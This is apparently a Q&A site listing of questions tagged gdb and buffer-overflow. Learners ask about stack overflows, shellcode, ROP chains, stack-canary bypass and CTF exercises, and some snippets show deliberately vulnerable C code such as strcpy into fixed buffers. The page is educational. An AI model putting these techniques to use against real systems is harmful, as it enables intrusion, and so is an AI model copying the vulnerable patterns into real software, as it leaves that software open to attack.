All Questions
Tagged with gdb buffer-overflow
15 questions
0
votes
0
answers
736
views
Using GDB to find the address of a buffer in a stripped C binary
I am working with a crackmes binary called Simple Overflow. It has two buffers with sizes 0x10 and 0x8, and it uses malloc to allocate two contiguous memory blocks (see <+25> and <+39> on ...
2
votes
2
answers
492
views
How can i recognize the length of this array based on the assembly instruction?
In the sourcecode i can clearly see that the Array called "buf" is 32 byte long since 1 char = 1 byte
I assume that the array starts at the address [rbp-0x30] and the argv[ ] is stored in ...
1
vote
1
answer
882
views
How can I get my shellcode to work outside of GDB?
I'm working inside a Warzone VM with no ALSR or NX bit. The program I'm trying to exploit is really simple:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/*
* compiled ...
- 113
3
votes
1
answer
327
views
Why EIP is being overwritten before local buffer ends?
I am doing a simple buffer overflow exercise, here is the source:
//vuln.c
#include <stdio.h>
#include <string.h>
int main(int argc, char* argv[]) {
char buf[256];
strcpy(buf,argv[...
- 33
1
vote
0
answers
841
views
Illegal instruction fault in stack based buffer overflow
I wrote this short C program to practice buffer overflow exploits:
#include <stdio.h>
#include <string.h>
#include <stddef.h>
#include <inttypes.h>
char *decode(char *s){
...
- 143
2
votes
1
answer
459
views
ROP chain: Buffer Overflow Return Pointer
I am trying to get a ROP exploit to work on Ubuntu 18.04 LTS 64bit.
I have a 64 bit binary (Nx enabled, ASLR disabled) with vuln function as follows:
public vuln
vuln proc near
var_100= byte ptr -...
3
votes
1
answer
928
views
Why do we need to know the address of shellcode?
I have read many articles regarding the buffer overflow exploit. Everywhere its written as follow.
"It's difficult to know the starting address of the shellcode"
Why do we need to know the address ...
3
votes
1
answer
942
views
Buffer overflow challenge - shell not opening
I'm working on a buffer overflow CTF challenge. The binary for this challenge includes a give_shell function (they cover shellcode in the next challenge)
I can successfully overwrite the saved EIP on ...
- 363
1
vote
0
answers
353
views
Stack buffer overflow SIGSEGV help
I've been going at this for a couple of days now working through trial and error but I can't seem to pinpoint exactly why I'm still getting a SIGSEGV.
Here's the stdout of me stepping through the ...
- 153
1
vote
1
answer
845
views
Buffer overflow on server
I have a server (for reference: pastebin.com/ghJX69uH) that I can netcat to and it will ask to input a message.
I know it is vulnerable to buffer overflow, but I can't seem to get the shellcode to ...
- 123
6
votes
3
answers
18k
views
How to effectively bypass GCC stack smashing detection
I was solving bof challenge on http://pwnable.kr/play.php
it is required to smash the stack of the following code
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void ...
- 335
0
votes
1
answer
384
views
buffer overflow-seg fault
I am trying to overflow a buffer, which has a size of 0x201 bytes, and get a shellcode. The program that contains the buffer,there is a call to ptrace() (on itself), therefore the shellcode I'm using ...
- 1
2
votes
1
answer
15k
views
Problem finding return address for shellcode
Howdy guys and ghouls,
I've got a classic b0f, in fact it's the protostar stack5 exercise
link to stack5 code
Now I have the buffer + shellcode running up to overwriting EIP and I need to provide ...
7
votes
1
answer
2k
views
GDB Error "Too many array elements"
I'm trying to understand very basic stack-based buffer overflow
I'm running Debian wheezy on a x86_64 Macbook Pro.
I have the following unsafe program:
#include <stdlib.h>
#include <stdio.h&...
- 173
3
votes
2
answers
410
views
Why is this string on the stack not exactly the one I entered? [closed]
I was trying to understand buffer overflow attacks using the following C program
#include"stdio.h"
#include"string.h"
void iwontprint()
{
printf("i wont be printed!");
}
void ...
- 223